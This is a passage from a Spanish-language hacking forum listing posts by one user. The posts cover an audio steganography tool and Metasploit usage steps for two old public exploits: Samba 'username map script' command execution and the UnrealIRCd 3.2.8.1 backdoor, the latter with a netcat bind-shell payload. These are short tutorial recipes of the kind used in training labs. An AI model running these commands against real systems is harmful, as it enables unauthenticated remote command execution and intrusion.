Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - 0xZANUT

#1
Ocultando información sobre archivos de audio - Mr. Robot


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es una herramienta de esteganografia que convierte archivos secretos en audios. La aplicación también le permite extraer los archivos secretos directamente de archivos de audio o pistas de CD de audio, también admite el cifrado de archivos secretos utilizando AES-256 (Advanced Encryption Standard) para mejorar la protección de datos.

Proof of Concept






Atentamente, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#2
Samba "username map script" Command Execution


Este módulo explota una vulnerabilidad de ejecución de comandos en las versiones 3.0.20 a 3.0.25rc3 de Samba cuando se utiliza la opción de configuración "username map script" que no es el valor predeterminado. Al especificar un nombre de usuario que contiene caracteres meta de shell, los atacantes pueden ejecutar comandos arbitrarios. No se necesita autenticación para explotar esta vulnerabilidad ya que esta opción se utiliza para asignar nombres de usuario antes de la autenticación.

Forma de uso


Código: php
      msf > use exploit/multi/samba/usermap_script
      msf exploit(usermap_script) > show options
            ...show options
      msf exploit(usermap_script) > set RHOST <rhost-id>
      msf exploit(usermap_script) > exploit
            ...now wait


Proof of Concept






Atentamente, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#3
UnrealIRCD 3.2.8.1 Backdoor Command Execution


Este módulo explota una puerta trasera que se agregó al archivo de descarga de Unreal IRCD 3.2.8.1. Esta puerta trasera estaba presente en el archivo Unreal3.2.8.1.tar.gz entre noviembre de 2009 y 12 de junio de 2010.

Forma de uso


Código: php

      msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
      msf exploit(unreal_ircd_3281_backdoor) > show options
            ...show options
      msf exploit(unreal_ircd_3281_backdoor) > set RHOST <rhost-id>
      msf exploit(unreal_ircd_3281_backdoor) > show payloads
      msf exploit(unreal_ircd_3281_backdoor) > set PAYLOADS cmd/unix/bind_netcat
      msf exploit(unreal_ircd_3281_backdoor) > exploit
            ...now wait


Proof of Concept






Atentamente, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta